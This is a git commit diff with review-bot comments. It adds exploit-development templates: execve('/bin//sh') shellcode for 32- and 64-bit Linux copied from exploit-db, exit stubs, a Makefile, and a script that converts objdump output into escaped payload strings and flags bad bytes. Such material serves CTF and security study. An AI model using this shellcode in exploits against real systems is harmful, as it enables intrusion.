-rw-r--r--.gitignore8
-rw-r--r--templates/shellcode/Makefile17
-rw-r--r--templates/shellcode/exit32.asm8
-rw-r--r--templates/shellcode/exit64.asm8
-rw-r--r--templates/shellcode/shell32.asm14
-rw-r--r--templates/shellcode/shell64.asm15
-rwxr-xr-xtemplates/shellcode/shelltool.py30
-rw-r--r--tools/.gitignore1
-rw-r--r--tools/genhex.cpp33
9 files changed, 100 insertions, 34 deletions
diff --git a/.gitignore b/.gitignore
new file mode 100644
index 0000000..e76473b
--- /dev/null
+++ b/.gitignore
@@ -0,0 +1,8 @@
+__pycache__/
+a.out
+*.o
+*.elf
+*.exe
+*.dll
+*.a
+*.so
diff --git a/templates/shellcode/Makefile b/templates/shellcode/Makefile
new file mode 100644
index 0000000..2e67adc
--- /dev/null
+++ b/templates/shellcode/Makefile
@@ -0,0 +1,17 @@
+.PHONY: all
+
+all: shell32.elf shell64.elf
+ @objdump -d shell32.elf | ./shelltool.py
+ @objdump -d shell64.elf | ./shelltool.py
+
+shell32.o: shell32.asm
+ nasm -f elf shell32.asm -o shell32.o
+
+shell32.elf: shell32.o
+ ld -melf_i386 shell32.o -o shell32.elf
+
+shell64.o: shell64.asm
+ nasm -f elf64 shell64.asm -o shell64.o
+
+shell64.elf: shell64.o
+ ld shell64.o -o shell64.elf
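Review bot: exit32.asm and exit64.asm are added in this same commit, but no rule here assembles them, so `make` never builds or byte-checks those two templates. GNU make pattern rules such as `%32.o: %32.asm` and `%64.o: %64.asm`, with matching `%32.elf` and `%64.elf` link rules, would cover all four files without per-file duplication. The `all` recipe also runs `./shelltool.py` without listing it as a prerequisite, and there is no `clean` target for the `*.o` and `*.elf` outputs that the new .gitignore hides.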
diff --git a/templates/shellcode/exit32.asm b/templates/shellcode/exit32.asm
new file mode 100644
index 0000000..559c89c
--- /dev/null
+++ b/templates/shellcode/exit32.asm
@@ -0,0 +1,8 @@
+[SECTION .text]
+global _start
+
+_start:
+ xor ebx, ebx
+ xor eax, eax
+ mov al, 0x1
+ int 0x80
diff --git a/templates/shellcode/exit64.asm b/templates/shellcode/exit64.asm
new file mode 100644
index 0000000..fb899a2
--- /dev/null
+++ b/templates/shellcode/exit64.asm
@@ -0,0 +1,8 @@
+[SECTION .text]
+global _start
+
+_start:
+ xor rdi, rdi
+ mov al, 0x3c
+ cdq
+ syscall
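Review bot: `mov al, 0x3c` writes only the low byte of rax and nothing before it clears the register, so the syscall number is 0x3c only if rax is already zero when `_start` runs. exit32.asm in this commit does not rely on that, because it clears the register first with `xor eax, eax`. The file has no comments at all, so the assumption should at least be stated, for example `; exit(0): assumes rax == 0 on entry, only al is written`.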
diff --git a/templates/shellcode/shell32.asm b/templates/shellcode/shell32.asm
new file mode 100644
index 0000000..d12910f
--- /dev/null
+++ b/templates/shellcode/shell32.asm
@@ -0,0 +1,14 @@
+[SECTION .text]
+global _start
+
+; https://www.exploit-db.com/shellcodes/46809
+
+_start:
+ xor ecx, ecx
+ push 0xb
+ pop eax
+ push ecx
+ push 0x68732f2f
+ push 0x6e69622f
+ mov ebx, esp
+ int 0x80
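Review bot: The only comment in this file is the exploit-db URL, so a reader auditing the repository has to decode the pushed constants to learn what the template does. A header comment above `_start` such as `; execve("/bin//sh") via int 0x80, eax = 0xb` would make that explicit; 0x6e69622f and 0x68732f2f are the little-endian bytes of "/bin" and "//sh". shell64.asm has the same gap and should get the equivalent line for its `syscall` with al = 0x3b. Both bodies appear to come from the linked third-party listings, so the comment should also say whether they were copied verbatim or modified.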
diff --git a/templates/shellcode/shell64.asm b/templates/shellcode/shell64.asm
new file mode 100644
index 0000000..a6d4626
--- /dev/null
+++ b/templates/shellcode/shell64.asm
@@ -0,0 +1,15 @@
+[SECTION .text]
+global _start
+
+; https://www.exploit-db.com/shellcodes/47008
+
+_start:
+ xor rsi, rsi
+ push rsi
+ mov rdi, 0x68732f2f6e69622f
+ push rdi
+ push rsp
+ pop rdi
+ mov al, 0x3b
+ cdq
+ syscall
diff --git a/templates/shellcode/shelltool.py b/templates/shellcode/shelltool.py
new file mode 100755
index 0000000..b95a8cd
--- /dev/null
+++ b/templates/shellcode/shelltool.py
@@ -0,0 +1,30 @@
+#!/usr/bin/env python
+
+# This script will convert shellcode disassembly into an escaped string literal
+# and warn about problematic bytes in the payload.
+# objdump -d elf | ./shelltool.py
+
+import sys
+
+name = None
+bytecode = []
+badchars = [ 0x00, 0x0a ]
+
+for line in sys.stdin:
+ for tok in line.split():
+ if name is None:
+ name = tok
+ if len(tok) == 2:
+ try:
+ bytecode.append(int(tok, base=16))
+ except:
+ pass
+
+result = ''.join([ "\\x%02x"%(x) for x in bytecode ])
+result = f'{name}"{result}"'
+
+for x in badchars:
+ if x in bytecode:
+ result += f' **0x{"%02x"%(x)} detected**'
+
+print(result)
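Review bot: The shebang `#!/usr/bin/env python` does not guarantee Python 3, yet the script uses f-strings, so on a host where `python` is Python 2 or absent the Makefile's `all` recipe fails; `#!/usr/bin/env python3` is the safer line. The bare `except:` around `int(tok, base=16)` also swallows KeyboardInterrupt and unrelated errors, and should be `except ValueError:`. Separately, every two-character token that parses as hex is counted as a payload byte, so the output is only trustworthy for `objdump -d` input in the layout the script expects. The header comment should state that limitation.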
diff --git a/tools/.gitignore b/tools/.gitignore
deleted file mode 100644
index c18dd8d..0000000
--- a/tools/.gitignore
+++ /dev/null
@@ -1 +0,0 @@
-__pycache__/
diff --git a/tools/genhex.cpp b/tools/genhex.cpp
deleted file mode 100644
index a37f91e..0000000
--- a/tools/genhex.cpp
+++ /dev/null
@@ -1,33 +0,0 @@
-#include <iostream>
-#include <string>
-
-/*
- * Read in all of stdin (should be piped from objdump), look for bytecode hex,
- * and print this code, escaped in a C-string literal, to stdout.
- *
- * EG output: "\x01\x02\x03\x04"
- */
-
-int main()
-{
- std::string tmp;
- unsigned int hex;
-
- std::cout << "\"";
-
- while (true)
- {
- std::cin >> tmp;
-
- if (std::cin.eof())
- break;
-
- if (tmp.size() == 2 &&
- tmp.find(":") == std::string::npos &&
- sscanf(tmp.c_str(), "%x", &hex) > 0)
- std::cout << "\\x" << tmp;
- }
-
- std::cout << "\"\n";
- return 0;
-}